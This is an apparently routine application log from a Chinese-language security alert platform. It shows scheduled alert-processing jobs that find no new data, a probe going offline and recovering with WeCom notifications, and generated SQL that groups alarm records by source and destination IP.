2026-05-19 11:30:00.917 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:30:00.917 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.011 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:31:00.011 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:31:00.011
2026-05-19 11:31:00.012 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:31:00.229 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:31:00.231 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:31:00.461 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.464 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:31:00.815 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:31:00.815 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:31:00.817 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:806ms
2026-05-19 11:32:00.003 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:32:00.004 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:32:00.236 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:32:00.236 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:32:00.496 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:32:00.511 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:33:00.003 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:33:00.004 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:33:00.222 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:33:00.222 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:33:00.453 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:33:00.457 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:34:00.011 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:34:00.012 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:34:00.231 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:34:00.233 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:34:00.472 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:34:00.477 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.005 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:35:00.005 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:35:00.079 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:78ms
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:35:00.157
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:35:00.157
2026-05-19 11:35:00.230 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:35:00.230 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:35:00.482 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.488 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.585 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:35:00.586 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 429ms
2026-05-19 11:36:00.013 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:36:00.013 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:36:00.013
2026-05-19 11:36:00.014 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:36:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:36:00.238 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:36:00.469 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:36:00.516 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:798ms
2026-05-19 11:37:00.010 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:37:00.010 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:37:00.230 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:37:00.231 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:37:00.541 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:37:00.544 [log-processor-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:38:00.009 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:38:00.009 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:38:00.231 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:38:00.239 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:38:00.518 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:38:00.864 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:38:01.705 [scheduling-6] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T11:38, now=2026-05-19T11:38:01.484
2026-05-19 11:38:01.705 [scheduling-6] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:38:02.142 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 11:28:00, 2026-05-19 11:38:00]
2026-05-19 11:38:02.142 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519113801852, windowType=tumble, dataStartTime=2026-05-19 11:28:00, dataEndTime=2026-05-19 11:38:00
2026-05-19 11:38:03.349 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:28:00' AND log_time < '2026-05-19 11:38:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:38:03.796 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:38:04.098 [scheduling-6] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 11:48:00
2026-05-19 11:38:04.098 [scheduling-6] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 11:39:00.013 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:39:00.013 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:39:00.229 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:39:00.234 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:39:00.564 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:39:00.564 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.013 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:40:00.013 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 11:40:00.013 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:40:00.087 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:40:00.161 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:74ms
2026-05-19 11:40:00.161 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:40:00.161
2026-05-19 11:40:00.162 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:40:00.162
2026-05-19 11:40:00.233 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:40:00.235 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:40:00.382 [scheduling-9] INFO c.c.service.WecomNotificationService - 插入微信通知成功, ID: 83, 类型: probe_offline, 内容: 探针离线-1
2026-05-19 11:40:00.382 [scheduling-9] WARN c.c.service.WecomNotificationService - 发送微信告警通知 - 名称: 探针离线-1, 类型: probe_offline, 等级: 4, 内容: 【探针离线告警】
探针ID: 1
探针名称: ????????-01
探针IP: 192.168.0.124
版本: V1.0.0-20260509
离线时间: 2026-05-19 11:40:00
最后心跳: 2026-05-19 11:29:05
建议: 请检查探针服务是否正常运行
2026-05-19 11:40:00.382 [scheduling-9] INFO c.c.service.ProbeHeartbeatService - 发送探针离线告警成功, 通知ID: 83
2026-05-19 11:40:00.382 [scheduling-9] WARN c.c.service.ProbeHeartbeatService - 探针 1 已离线,最后心跳时间: 2026-05-19T11:29:05.628
2026-05-19 11:40:00.456 [scheduling-9] WARN c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,发现 1 个新离线探针, 离线阈值: 10分钟, 耗时: 443ms
2026-05-19 11:40:00.457 [scheduling-9] WARN c.c.s.ProbeStatusCheckScheduler - 离线探针: collectId=1, ip=192.168.0.124, name=????????-01
2026-05-19 11:40:00.472 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.472 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.572 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:40:00.573 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 412ms
2026-05-19 11:40:00.602 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=0, 离线=1
2026-05-19 11:40:00.602 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 11:41:00.002 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:41:00.002
2026-05-19 11:41:00.002 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:41:00.002 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:41:00.226 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:41:00.226 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:41:00.541 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:41:00.551 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:683ms
2026-05-19 11:42:00.002 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:42:00.002 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:42:00.219 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:42:00.220 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:42:00.546 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:42:00.555 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:43:00.001 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:43:00.001 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:43:00.221 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:43:00.222 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:43:00.443 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:43:00.552 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:44:00.007 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:44:00.007 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:44:00.234 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:44:00.243 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:44:00.870 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:44:00.871 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:45:00.004 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:45:00.004 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:45:00.078 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:87ms
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:45:00.165
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:45:00.165
2026-05-19 11:45:00.223 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:45:00.226 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:45:00.456 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:45:00.548 [scheduling-7] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:45:00.549 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 384ms
2026-05-19 11:45:00.816 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.010 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:46:00.010 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:46:00.010
2026-05-19 11:46:00.010 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:46:00.232 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:46:00.233 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:46:00.467 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.472 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:835ms
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.WecomNotificationService - 插入微信通知成功, ID: 84, 类型: probe_recovery, 内容: 探针恢复-1
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] WARN c.c.service.WecomNotificationService - 发送微信告警通知 - 名称: 探针恢复-1, 类型: probe_recovery, 等级: 1, 内容: 【探针恢复通知】
探针ID: 1
探针名称: ????????-01
探针IP: 192.168.0.124
恢复时间: 2026-05-19 11:46:28
状态: 已恢复正常
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.ProbeHeartbeatService - 发送探针恢复通知成功, 通知ID: 84
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.ProbeHeartbeatService - 探针 1 已恢复在线
2026-05-19 11:47:00.011 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:47:00.011 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:47:00.230 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:47:00.233 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:47:00.483 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:47:00.485 [log-processor-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:48:00.003 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:48:00.003 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:48:00.224 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:48:00.227 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:48:00.490 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:48:00.492 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:48:07.792 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T11:48, now=2026-05-19T11:48:07.564
2026-05-19 11:48:07.792 [scheduling-4] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:48:08.241 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 11:38:00, 2026-05-19 11:48:00]
2026-05-19 11:48:08.241 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519114807942, windowType=tumble, dataStartTime=2026-05-19 11:38:00, dataEndTime=2026-05-19 11:48:00
2026-05-19 11:48:09.462 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:38:00' AND log_time < '2026-05-19 11:48:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:48:09.927 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:48:10.230 [scheduling-4] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 11:58:00
2026-05-19 11:48:10.230 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 11:49:00.000 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:49:00.010 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:49:00.218 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:49:00.238 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
